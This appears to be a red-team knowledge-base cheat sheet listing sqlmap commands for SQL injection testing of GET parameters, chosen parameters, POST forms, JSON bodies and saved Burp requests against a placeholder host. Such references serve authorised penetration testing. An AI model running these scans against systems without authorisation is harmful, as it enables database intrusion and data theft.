Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SQL / SQLMAP / HTTP

Targeting


# GET param 
sqlmap -u "http://t/app.php?id=1" --batch  

# Choose params explicitly 
sqlmap -u "http://t/app.php?a=1&b=2" -p b --batch  

# POST form 
sqlmap -u "http://t/login" --data "u=admin&p=pass" --batch  

# JSON body 
sqlmap -u "http://t/api" --headers="Content-Type: application/json" \ 
--data '{"name":"test","age":"12"}' --batch  

# From raw request (copy from Burp: save as req.txt) 
sqlmap -r req.txt --batch